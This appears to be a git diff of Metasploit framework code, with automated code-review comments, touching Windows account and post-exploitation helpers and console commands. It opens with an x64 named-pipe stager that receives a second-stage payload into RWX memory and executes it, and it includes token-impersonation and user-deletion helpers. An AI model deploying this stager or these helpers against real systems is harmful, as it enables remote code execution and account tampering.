'CreateFileA')} + call rbp ; CreateFileA(...) + + ; check for failure + cmp rax, -1 ; did it work? 
+ jnz connected + + handle_connect_failure: + dec r14 ; decrement the retry count + jnz retry_start + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call rbp + ^ + end + + asm << %Q^ + ; this lable is required so that reconnect attempts include + ; the UUID stuff if required. + connected: + xchg rdi, rax ; Save the file handler for later + ^ + asm << asm_write_uuid if include_send_uuid + + asm << %Q^ + ; Receive the size of the incoming second stage... + push 0 ; buffer for lpNumberOfBytesRead + mov r9, rsp ; lpNumberOfBytesRead + push 0 ; buffer for lpBuffer + mov rsi, rsp ; lpNumberOfBytesRead + push 4 ; sizeof(DWORD) + pop r8 ; nNumberOfBytesToRead + push 0 ; alignment + push 0 ; lpOverlapped + mov rdx, rsi ; lpBuffer + mov rcx, rdi ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call rbp ; ReadFile(...) + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the received worked, and reconnect + ; if it fails + test eax, eax + jz cleanup_file + mov rax, [rsi+8] + test eax, eax + jz cleanup_file + ^ + end + + asm << %Q^ + + ; Alloc a RWX buffer for the second stage + add rsp, 0x30 ; slight stack adjustment + pop rsi ; pop off the second stage length + pop rax ; line the stack up again + mov esi, esi ; only use the lower-order 32 bits for the size + push 0x40 ; + pop r9 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; + pop r8 ; MEM_COMMIT + mov rdx, rsi ; the newly recieved second stage length. + xor rcx, rcx ; NULL as we dont care where the allocation is. + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + ; Receive the second stage and execute it... 
+ mov rbx, rax ; rbx = our new memory address for the new stage + mov r15, rax ; save the address so we can jump into it later + + read_more: + ; prepare the size min(0x10000, esi) + mov r8, 0x10000 ; stupid named pipe buffer limit + cmp r8, rsi + jle size_is_good + mov r8, rsi + + size_is_good: + ; Invoke a read + push 0 ; buffer for lpNumberOfBytesRead + mov r9, rsp ; lpNumberOfBytesRead + mov rdx, rbx ; lpBuffer + push 0 ; lpOverlapped + mov rcx, rdi ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call rbp ; ReadFile(...) + add rsp, 0x28 ; slight stack adjustment + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the read worked + ; if it fails + test eax, eax + jnz read_successful + + ; something failed so free up memory + pop rax + push r15 + pop rcx ; lpAddress + push 0x4000 ; MEM_DECOMMIT + pop r8 ; dwFreeType + push 0 ; 0 + pop rdx ; dwSize + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT) + + cleanup_file: + ; clean up the socket + push rdi ; file handle + pop rcx ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + call rbp + + ; and try again + dec r14 ; decrement the retry count + jmp retry_start + ^ + end + + asm << %Q^ + read_successful: + pop rax + add rbx, rax ; buffer += bytes_received + sub rsi, rax ; length -= bytes_received + test rsi, rsi ; test length + jnz read_more ; continue if we have more to read + jmp r15 ; return into the second stage + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + + asm + end + +end + +end diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb index b09425f198..37637f147e 100644 --- a/lib/msf/core/post/unix.rb +++ b/lib/msf/core/post/unix.rb 
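Review bot: `asm_reverse_named_pipe` hard-codes `reliable = false` with the `#reliable = opts[:reliable]` line commented out, so every `if reliable` block in the method is dead code while `generate` still sets `conf[:reliable] = true` and `required_space` still adds 57 bytes for it; either restore the assignment or drop the dead branches and the allowance, and if disabling reliability on x64 is deliberate, say why in a comment. `handle_connect_failure` does `dec r14` then `jnz retry_start`, but `retry_start` re-executes `push #{retry_count}` / `pop r14`, so the counter is reset on every failed CreateFileA and the loop only terminates when retry_count is 1; the x86 stub in this commit jumps to `try_reverse_named_pipe` instead and the same target is needed here, including the `jmp retry_start` in the (currently dead) cleanup path. The asm comments `this lable is required` and `newly recieved` have typos.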
@@ -40,14 +40,17 @@ module Msf::Post::Unix # def get_groups groups = [] - cmd_out = read_file("/etc/group").split("\n") - cmd_out.each do |l| - entry = {} - user_field = l.split(":") - entry[:name] = user_field[0] - entry[:gid] = user_field[2] - entry[:users] = user_field[3] - groups << entry + group = '/etc/group' + if file_exist?(group) + cmd_out = read_file(group).split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:gid] = user_field[2] + entry[:users] = user_field[3] + groups << entry + end end return groups end @@ -59,8 +62,11 @@ module Msf::Post::Unix user_dirs = [] # get all user directories from /etc/passwd - read_file("/etc/passwd").each_line do |passwd_line| - user_dirs << passwd_line.split(/:/)[5] + passwd = '/etc/passwd' + if file_exist?(passwd) + read_file(passwd).each_line do |passwd_line| + user_dirs << passwd_line.split(/:/)[5] + end end # also list other common places for home directories in the event that diff --git a/lib/msf/core/post/windows/accounts.rb b/lib/msf/core/post/windows/accounts.rb index 72dc1bcc11..58f5655153 100644 --- a/lib/msf/core/post/windows/accounts.rb +++ b/lib/msf/core/post/windows/accounts.rb 
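Review bot: In `get_groups` the new `file_exist?(group)` guard only covers absence; if `read_file` yields nil for a file that exists but cannot be read, `read_file(group).split("\n")` still raises NoMethodError, so the guard does not fully deliver the robustness the change is after (this depends on read_file's failure contract, which is outside the hunk). `cmd_out = read_file(group).to_s.split("\n")` would make the loop a no-op in that case, and the same applies to `read_file(passwd).each_line` in the second hunk, whose enclosing method starts outside the hunk. The explicit `return groups` at the end of `get_groups` can be a bare `groups`.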
@@ -3,336 +3,342 @@ require 'msf/core/post/windows/error' module Msf -class Post -module Windows + class Post + module Windows + module Accounts + include Msf::Post::Windows::Error -module Accounts - include Msf::Post::Windows::Error + GUID = [ + ['Data1', :DWORD], + ['Data2', :WORD], + ['Data3', :WORD], + ['Data4', 'BYTE[8]'] + ].freeze - GUID = [ - ['Data1',:DWORD], - ['Data2',:WORD], - ['Data3',:WORD], - ['Data4','BYTE[8]'] - ] + DOMAIN_CONTROLLER_INFO = [ + ['DomainControllerName', :LPSTR], + ['DomainControllerAddress', :LPSTR], + ['DomainControllerAddressType', :ULONG], + ['DomainGuid', GUID], + ['DomainName', :LPSTR], + ['DnsForestName', :LPSTR], + ['Flags', :ULONG], + ['DcSiteName', :LPSTR], + ['ClientSiteName', :LPSTR] + ].freeze - DOMAIN_CONTROLLER_INFO = [ - ['DomainControllerName',:LPSTR], - ['DomainControllerAddress',:LPSTR], - ['DomainControllerAddressType',:ULONG], - ['DomainGuid',GUID], - ['DomainName',:LPSTR], - ['DnsForestName',:LPSTR], - ['Flags',:ULONG], - ['DcSiteName',:LPSTR], - ['ClientSiteName',:LPSTR] - ] + ## + # get_domain(server_name = nil) + # + # Summary: + # Retrieves the current DomainName the given server is + # a member of. + # + # Parameters + # server_name - DNS or NetBIOS name of the remote server + # Returns: + # The DomainName of the remote server or nil if windows + # could not retrieve the DomainControllerInfo or encountered + # an exception. + # + ## + def get_domain(server_name = nil) + domain = nil + result = session.railgun.netapi32.DsGetDcNameA( + server_name, + nil, + nil, + nil, + 0, + 4 + ) - ## - # get_domain(server_name=nil) - # - # Summary: - # Retrieves the current DomainName the given server is - # a member of. - # - # Parameters - # server_name - DNS or NetBIOS name of the remote server - # Returns: - # The DomainName of the remote server or nil if windows - # could not retrieve the DomainControllerInfo or encountered - # an exception. 
- # - ## - def get_domain(server_name=nil) - domain = nil - result = session.railgun.netapi32.DsGetDcNameA( - server_name, - nil, - nil, - nil, - 0, - 4) + begin + dc_info_addr = result['DomainControllerInfo'] + unless dc_info_addr == 0 + dc_info = session.railgun.util.read_data(DOMAIN_CONTROLLER_INFO, dc_info_addr) + pointer = session.railgun.util.unpack_pointer(dc_info['DomainName']) + domain = session.railgun.util.read_string(pointer) + end + ensure + session.railgun.netapi32.NetApiBufferFree(dc_info_addr) + end - begin - dc_info_addr = result['DomainControllerInfo'] - unless dc_info_addr == 0 - dc_info = session.railgun.util.read_data(DOMAIN_CONTROLLER_INFO, dc_info_addr) - pointer = session.railgun.util.unpack_pointer(dc_info['DomainName']) - domain = session.railgun.util.read_string(pointer) - end - ensure - session.railgun.netapi32.NetApiBufferFree(dc_info_addr) - end + domain + end - domain - end + ## + # delete_user(username, server_name = nil) + # + # Summary: + # Deletes a user account from the given server (or local if none given) + # + # Parameters + # username - The username of the user to delete (not-qualified, e.g. BOB) + # server_name - DNS or NetBIOS name of remote server on which to delete user + # + # Returns: + # One of the following: + # :success - Everything went as planned + # :invalid_server - The server name provided was invalid + # :not_on_primary - Operation allowed only on domain controller + # :user_not_found - User specified does not exist on the given server + # :access_denied - You do not have permission to delete the given user + # + # OR nil if there was an exceptional Windows error (example: ran out of memory) + # + # Caveats: + # nil is returned if there is an *exceptional* Windows error. That error is printed. 
+ # Everything other than ':success' signifies failure + ## + def delete_user(username, server_name = nil) + deletion = client.railgun.netapi32.NetUserDel(server_name, username) - ## - # delete_user(username, server_name = nil) - # - # Summary: - # Deletes a user account from the given server (or local if none given) - # - # Parameters - # username - The username of the user to delete (not-qualified, e.g. BOB) - # server_name - DNS or NetBIOS name of remote server on which to delete user - # - # Returns: - # One of the following: - # :success - Everything went as planned - # :invalid_server - The server name provided was invalid - # :not_on_primary - Operation allowed only on domain controller - # :user_not_found - User specified does not exist on the given server - # :access_denied - You do not have permission to delete the given user - # - # OR nil if there was an exceptional windows error (example: ran out of memory) - # - # Caveats: - # nil is returned if there is an *exceptional* windows error. That error is printed. - # Everything other than ':success' signifies failure - ## - def delete_user(username, server_name = nil) - deletion = client.railgun.netapi32.NetUserDel(server_name, username) + # http://msdn.microsoft.com/en-us/library/aa370674.aspx + case deletion['return'] + when 2221 # NERR_UserNotFound + return :user_not_found + when 2351 # NERR_InvalidComputer + return :invalid_server + when 2226 # NERR_NotPrimary + return :not_on_primary + when client.railgun.const('ERROR_ACCESS_DENIED') + return :access_denied + when 0 + return :success + else + error = deletion['GetLastError'] + if error != 0 + print_error "Unexpected Windows System Error #{error}" + else + # Uh... 
we shouldn't be here + print_error "DeleteUser unexpectedly returned #{deletion['return']}" + end + end - #http://msdn.microsoft.com/en-us/library/aa370674.aspx - case deletion['return'] - when 2221 # NERR_UserNotFound - return :user_not_found - when 2351 # NERR_InvalidComputer - return :invalid_server - when 2226 # NERR_NotPrimary - return :not_on_primary - when client.railgun.const('ERROR_ACCESS_DENIED') - return :access_denied - when 0 - return :success - else - error = deletion['GetLastError'] - if error != 0 - print_error "Unexpected Windows System Error #{error}" - else - # Uh... we shouldn't be here - print_error "DeleteUser unexpectedly returned #{deletion['return']}" - end - end + # If we got here, then something above failed + nil + end - # If we got here, then something above failed - return nil - end + ## + # resolve_sid(sid, system_name = nil) + # + # Summary: + # Retrieves the name, domain, and type of account for the given sid + # + # Parameters: + # sid - A SID string (e.g. S-1-5-32-544) + # system_name - Where to search. If nil, first local system then trusted DCs + # + # Returns: + # { + # name: account name (e.g. "SYSTEM") + # domain: domain where the account name was found. May have values such as + # the work station's name, BUILTIN, NT AUTHORITY, or an empty string + # type: one of :user, :group, :domain, :alias, :well_known_group, + # :deleted_account, :invalid, :unknown, :computer + # mapped: There was a mapping found for the SID + # } + # + # OR nil if there was an exceptional Windows error (example: ran out of memory) + # + # Caveats: + # If a valid mapping is not found, only { mapped: false } will be returned + # nil is returned if there is an *exceptional* Windows error. That error is printed. 
+ # If an invalid system_name is provided, there will be a Windows error and nil returned + ## + def resolve_sid(sid, system_name = nil) + adv = client.railgun.advapi32 + # Second param is the size of the buffer where the pointer will be written + # In railgun, if you specify 4 bytes for a PDWORD it will grow to 8, as needed. + conversion = adv.ConvertStringSidToSidA(sid, 4) - ## - # resolve_sid(sid, system_name = nil) - # - # Summary: - # Retrieves the name, domain, and type of account for the given sid - # - # Parameters: - # sid - A SID string (e.g. S-1-5-32-544) - # system_name - Where to search. If nil, first local system then trusted DCs - # - # Returns: - # { - # :name => account name (e.g. "SYSTEM") - # :domain => domain where the account name was found. May have values such as - # the work station's name, BUILTIN, NT AUTHORITY, or an empty string - # :type => one of :user, :group, :domain, :alias, :well_known_group, - # :deleted_account, :invalid, :unknown, :computer - # :mapped => There was a mapping found for the SID - # } - # - # OR nil if there was an exceptional windows error (example: ran out of memory) - # - # Caveats: - # If a valid mapping is not found, only { :mapped => false } will be returned - # nil is returned if there is an *exceptional* windows error. That error is printed. - # If an invalid system_name is provided, there will be a windows error and nil returned - ## - def resolve_sid(sid, system_name = nil) - adv = client.railgun.advapi32; + # If the call failed, handle errors accordingly. + unless conversion['return'] + error = conversion['GetLastError'] - # Second param is the size of the buffer where the pointer will be written - # In railgun, if you specify 4 bytes for a PDWORD it will grow to 8, as needed. 
- conversion = adv.ConvertStringSidToSidA(sid, 4) + case error + when client.railgun.const('ERROR_INVALID_SID') + # An invalid SID was supplied + return { type: :invalid, mapped: false } + when client.railgun.const('ERROR_NONE_MAPPED') + # There were no accounts associated with this SID + return { mapped: false } + else + print_error "Unexpected Windows error #{error} resolving SID #{sid}" + return nil + end + end - # If the call failed, handle errors accordingly. - unless conversion['return'] - error = conversion['GetLastError'] + psid = conversion['pSid'] - case error - when client.railgun.const('ERROR_INVALID_SID') - # An invalid SID was supplied - return { :type => :invalid, :mapped => false } - else - print_error "Unexpected windows error #{error}" - return nil - end - end + # Begin/Ensure so we free the pSid buffer... + begin + # A reference to the SID data structure. Generally needed when working with sids - psid = conversion['pSid'] + # http://msdn.microsoft.com/en-us/library/aa379166(v=vs.85).aspx + lp_name = lp_referenced_domain_name = 100 + cch_name = cch_referenced_domain_name = 100 + lookup = adv.LookupAccountSidA( + system_name, + psid, + lp_name, + cch_name, + lp_referenced_domain_name, + cch_referenced_domain_name, + 1 + ) - # Begin/Ensure so we free the pSid buffer... - begin - # A reference to the SID data structure. 
Generally needed when working with sids + if !lookup['return'] && lookup['GetLastError'] == INSUFFICIENT_BUFFER + lp_name = cch_name = lookup['cchName'] + lp_referenced_domain_name = cch_referenced_domain_name = lookup['cchReferencedDomainName'] - # http://msdn.microsoft.com/en-us/library/aa379166(v=vs.85).aspx - lp_name = lp_referenced_domain_name = 100 - cch_name = cch_referenced_domain_name = 100 - lookup = adv.LookupAccountSidA(system_name, - psid, - lp_name, - cch_name, - lp_referenced_domain_name, - cch_referenced_domain_name, - 1) + lookup = adv.LookupAccountSidA( + system_name, + psid, + lp_name, + cch_name, + lp_referenced_domain_name, + cch_referenced_domain_name, + 1 + ) - if !lookup['return'] && lookup['GetLastError'] == INSUFFICIENT_BUFFER - lp_name = cch_name = lookup['cchName'] - lp_referenced_domain_name = cch_referenced_domain_name = lookup['cchReferencedDomainName'] + elsif !lookup['return'] + print_error "Unexpected Windows error #{lookup['GetLastError']}" + return nil + end + ensure + # We no longer need the sid so free it. + adv.FreeSid(psid) + end - lookup = adv.LookupAccountSidA(system_name, - psid, - lp_name, - cch_name, - lp_referenced_domain_name, - cch_referenced_domain_name, - 1) - elsif !lookup['return'] - print_error "Unexpected windows error #{lookup['GetLastError']}" - return nil - end - ensure - # We no longer need the sid so free it. - adv.FreeSid(psid) - end + # If the call failed, handle errors accordingly. + unless lookup['return'] + error = lookup['GetLastError'] - # If the call failed, handle errors accordingly. 
- unless lookup['return'] - error = lookup['GetLastError'] + case error + when client.railgun.const('ERROR_INVALID_PARAMETER') + # Unless the railgun call is broken, this means revision is wrong + return { type: :invalid } + when client.railgun.const('ERROR_NONE_MAPPED') + # There were no accounts associated with this SID + return { mapped: false } + else + print_error "Unexpected Windows error #{error} resolving SID #{sid}" + return nil + end + end - case error - when client.railgun.const('ERROR_INVALID_PARAMETER') - # Unless the railgun call is broken, this means revision is wrong - return { :type => :invalid } - when client.railgun.const('ERROR_NONE_MAPPED') - # There were no accounts associated with this SID - return { :mapped => false } - else - print_error "Unexpected windows error #{error}" - return nil - end - end + # peUse is the enum "SID_NAME_USE" + sid_type = lookup_SID_NAME_USE(lookup['peUse'].unpack('C')[0]) - # peUse is the enum "SID_NAME_USE" - sid_type = lookup_SID_NAME_USE(lookup['peUse'].unpack('C')[0]) + return { + name: lookup['Name'], + domain: lookup['ReferencedDomainName'], + type: sid_type, + mapped: true + } + end - return { - :name => lookup['Name'], - :domain => lookup['ReferencedDomainName'], - :type => sid_type, - :mapped => true - } - end + private - private + ## + # Converts a WinAPI's SID_NAME_USE enum to a symbol + # Symbols are (in order) :user, :group, :domain, :alias, :well_known_group, + # :deleted_account, :invalid, :unknown, :computer + ## + def lookup_SID_NAME_USE(enum_value) + [ + # SidTypeUser = 1 + :user, + # SidTypeGroup, + :group, + # SidTypeDomain, + :domain, + # SidTypeAlias, + :alias, + # SidTypeWellKnownGroup, + :well_known_group, + # SidTypeDeletedAccount, + :deleted_account, + # SidTypeInvalid, + :invalid, + # SidTypeUnknown, + :unknown, + # SidTypeComputer, + :computer, + # SidTypeLabel + :integrity_label + ][enum_value - 1] + end - ## - # Converts a WinAPI's SID_NAME_USE enum to a symbol - # Symbols are (in 
order) :user, :group, :domain, :alias, :well_known_group, - # :deleted_account, :invalid, :unknown, :computer - ## - def lookup_SID_NAME_USE(enum_value) - [ - # SidTypeUser = 1 - :user, - # SidTypeGroup, - :group, - #SidTypeDomain, - :domain, - #SidTypeAlias, - :alias, - #SidTypeWellKnownGroup, - :well_known_group, - #SidTypeDeletedAccount, - :deleted_account, - #SidTypeInvalid, - :invalid, - #SidTypeUnknown, - :unknown, - #SidTypeComputer, - :computer, - #SidTypeLabel - :integrity_label - ][enum_value - 1] - end + # Gets an impersonation token from the primary token. + # + # @return [Integer] the impersonate token handle identifier if success, nil if + # fails + def get_imperstoken + adv = session.railgun.advapi32 + tok_all = "TOKEN_ASSIGN_PRIMARY |TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | " + tok_all << "TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS" + tok_all << " | TOKEN_ADJUST_DEFAULT" - # Gets an impersonation token from the primary token. - # - # @return [Integer] the impersonate token handle identifier if success, nil if - # fails - def get_imperstoken - adv = session.railgun.advapi32 - tok_all = "TOKEN_ASSIGN_PRIMARY |TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | " - tok_all << "TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS" - tok_all << " | TOKEN_ADJUST_DEFAULT" + pid = session.sys.process.open.pid + pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) + pt = adv.OpenProcessToken(pr.handle, tok_all, 4) # get handle to primary token + it = adv.DuplicateToken(pt["TokenHandle"], 2, 4) # get an impersonation token + if it["return"] # if it fails return 0 for error handling + return it["DuplicateTokenHandle"] + else + return nil + end + end - pid = session.sys.process.open.pid - pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) - pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token - it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token - if 
it["return"] #if it fails return 0 for error handling - return it["DuplicateTokenHandle"] - else - return nil - end - end + # Gets the permissions granted from the Security Descriptor of a directory + # to an access token. + # + # @param [String] dir the directory path + # @param [Integer] token the access token + # @return [String, nil] a String describing the permissions or nil + def check_dir_perms(dir, token) + adv = session.railgun.advapi32 + si = "OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION" + result = "" - # Gets the permissions granted from the Security Descriptor of a directory - # to an access token. - # - # @param [String] dir the directory path - # @param [Integer] token the access token - # @return [String, nil] a String describing the permissions or nil - def check_dir_perms(dir, token) - adv = session.railgun.advapi32 - si = "OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION" - result = "" + # define generic mapping structure + gen_map = [0, 0, 0, 0] + gen_map = gen_map.pack("V") + buffer_size = 500 - #define generic mapping structure - gen_map = [0,0,0,0] - gen_map = gen_map.pack("V") - buffer_size = 500 + # get Security Descriptor for the directory + f = adv.GetFileSecurityA(dir, si, buffer_size, buffer_size, 4) + if f['return'] && f["lpnLengthNeeded"] <= buffer_size + sd = f["pSecurityDescriptor"] + elsif f['GetLastError'] == 122 # ERROR_INSUFFICIENT_BUFFER + sd = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) + elsif f['GetLastError'] == 2 + vprint_error("The system cannot find the file specified: #{dir}") + return nil + else + vprint_error("#{f['ErrorMessage']}: #{dir}") + return nil + end - #get Security Descriptor for the directory - f = adv.GetFileSecurityA(dir, si, buffer_size, buffer_size, 4) - if (f['return'] and f["lpnLengthNeeded"] <= buffer_size) - sd = f["pSecurityDescriptor"] - elsif (f['GetLastError'] == 122) # 
ERROR_INSUFFICIENT_BUFFER - f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) - elsif (f['GetLastError'] == 2) - vprint_error("The system cannot find the file specified: #{dir}") - return nil - else - vprint_error("#{f['ErrorMessage']}: #{dir}") - return nil - end + # check for write access, called once to get buffer size + a = adv.AccessCheck(sd, token, "ACCESS_READ | ACCESS_WRITE", gen_map, 0, 0, 4, 8) + len = a["PrivilegeSetLength"] - #check for write access, called once to get buffer size - a = adv.AccessCheck(sd, token, "ACCESS_READ | ACCESS_WRITE", gen_map, 0, 0, 4, 8) - len = a["PrivilegeSetLength"] + r = adv.AccessCheck(sd, token, "ACCESS_READ", gen_map, len, len, 4, 8) + return nil if !r["return"] + result << "R" if r["GrantedAccess"] > 0 - r = adv.AccessCheck(sd, token, "ACCESS_READ", gen_map, len, len, 4, 8) - if !r["return"] then return nil end - if r["GrantedAccess"] > 0 then result << "R" end + w = adv.AccessCheck(sd, token, "ACCESS_WRITE", gen_map, len, len, 4, 8) + return nil if !w["return"] + result << "W" if w["GrantedAccess"] > 0 - w = adv.AccessCheck(sd, token, "ACCESS_WRITE", gen_map, len, len, 4, 8) - if !w["return"] then return nil end - if w["GrantedAccess"] > 0 then result << "W" end - - result - end - -end # Accounts -end # Windows -end # Post + result + end + end # Accounts + end # Windows + end # Post end # Msf diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index 32efa7a978..a568d4446e 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -96,7 +96,7 @@ class Auxiliary } # Always run passive modules in the background - if (mod.passive or mod.passive_action?(action)) + if (mod.passive || mod.passive_action?(action || mod.default_action)) jobify = true end 
@@ -131,8 +131,8 @@ class Auxiliary return false end - if (jobify) - print_status("Auxiliary module running as background job") + if (jobify && mod.job_id) + print_status("Auxiliary module running as background job #{mod.job_id}.") else print_status("Auxiliary module execution completed") end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 3eab9f4ebf..7cdb60f0ba 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1528,6 +1528,10 @@ class Db } end + def find_nmap_path + Rex::FileUtils.find_full_path("nmap") || Rex::FileUtils.find_full_path("nmap.exe") + end + # # Import Nmap data from a file # @@ -1553,11 +1557,8 @@ class Db end end - nmap = - Rex::FileUtils.find_full_path("nmap") || - Rex::FileUtils.find_full_path("nmap.exe") - - if (not nmap) + nmap = find_nmap_path + unless nmap print_error("The nmap executable could not be found") return end @@ -1607,9 +1608,11 @@ class Db end def cmd_db_nmap_help - nmap = - Rex::FileUtils.find_full_path('nmap') || - Rex::FileUtils.find_full_path('nmap.exe') + nmap = find_nmap_path + unless nmap + print_error("The nmap executable could not be found") + return + end stdout, stderr = Open3.capture3([nmap, 'nmap'], '--help') @@ -1625,9 +1628,10 @@ class Db end def cmd_db_nmap_tabs(str, words) - nmap = - Rex::FileUtils.find_full_path('nmap') || - Rex::FileUtils.find_full_path('nmap.exe') + nmap = find_nmap_path + unless nmap + return + end stdout, stderr = Open3.capture3([nmap, 'nmap'], '--help') tabs = [] diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index a65c1a2093..08ac8aa8a7 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb 
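Review bot: With `jobify` true but `mod.job_id` nil, the new condition falls through to the else branch and prints "Auxiliary module execution completed", which misreports a background job that never started; the same shape appears in the exploit.rb hunk at `@@ -145,10 +145,8 @@` and the post.rb hunk at `@@ -131,8 +131,8 @@`. Whether a nil job_id can occur here after a successful run is not visible in this diff, but the old code at least printed the job message whenever jobify was set. An explicit middle branch keeps the messages honest: `elsif jobify` / `print_warning("Auxiliary module was set to run as a background job but no job id was assigned")`. The enclosing method starts outside the hunk.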
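Review bot: `cmd_db_nmap_tabs` now returns nil when `find_nmap_path` fails, whereas the rest of the method builds and returns the `tabs` array; tab-completion callers presumably expect an array (not visible here), so `return [] unless nmap` is the safer early exit and replaces the three-line `unless nmap ... end`. The same guard in `cmd_db_nmap_help` at `@@ -1607,9 +1608,11 @@` can also be the one-line modifier form `return print_error("The nmap executable could not be found") unless nmap`, though the nil return there is harmless. The enclosing method continues outside the hunk.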
@@ -145,10 +145,8 @@ class Exploit end # If we ran the exploit as a job, indicate such so the user doesn't # wonder what's up. - elsif (jobify) - if mod.job_id - print_status("Exploit running as background job.") - end + elsif (jobify && mod.job_id) + print_status("Exploit running as background job #{mod.job_id}.") # Worst case, the exploit ran but we got no session, bummer. else # If we didn't run a payload handler for this exploit it doesn't diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index b36e6a02e5..85fc1071d1 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -339,7 +339,7 @@ module Msf framework.jobs[job_id.to_s].send(:name=, job_name) end - print_status "Payload Handler Started as Job #{job_id}" + print_status "Payload handler running as background job #{job_id}." end end end diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index 6f4c26c074..c6c07ef26e 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb 
@@ -66,23 +66,26 @@ module Msf end def cmd_edit_help - msg = "Edit the currently active module" - msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}." - print_line "Usage: edit" + print_line "Usage: edit [file/to/edit.rb]" print_line - print_line msg - print_line "When done editing, you must reload the module with 'reload' or 'rerun'." + print_line "Edit a local file or the currently active module with #{local_editor}" + print_line "If a file path is specified it will automatically be reloaded after editing" + print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." print_line end # # Edit the currently active module # - def cmd_edit - if active_module - editor = local_editor - path = active_module.file_path + def cmd_edit(*args) + if args.length > 0 + path = args[0] + elsif active_module + path = active_module.file_path + end + if path + editor = local_editor if editor.nil? editor = 'vim' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") @@ -90,6 +93,10 @@ module Msf print_status("Launching #{editor} #{path}") system(editor, path) + + if args.length > 0 + load args[0] + end else print_error('Nothing to edit -- try using a module first.') end diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb index 7400d6b796..e117895149 100644 --- a/lib/msf/ui/console/command_dispatcher/post.rb +++ b/lib/msf/ui/console/command_dispatcher/post.rb @@ -131,8 +131,8 @@ class Post return false end - if (jobify) - print_status("Post module running as background job") + if (jobify && mod.job_id) + print_status("Post module running as background job #{mod.job_id}.") else print_status("Post module execution completed") end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 7be5510b23..84f211c961 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
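Review bot: `load args[0]` in the second hunk runs unconditionally after the editor returns, so a path that was never saved, a typo in the argument, or an editor that failed to launch surfaces as a raw LoadError in the console instead of a message; `system(editor, path)` returns false or nil on failure and that result is currently discarded. Guarding the reload with `load path if args.length > 0 && File.file?(path)` and printing an error otherwise keeps the console from raising. The help text interpolates `local_editor` into "with #{local_editor}" even when it is nil (the code then falls back to vim), so the fallback should be named in the help string as well. Since `load` executes the file inside the console process, the usage line should say the file is reloaded into the framework rather than merely edited. `cmd_edit` closes outside the second hunk.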
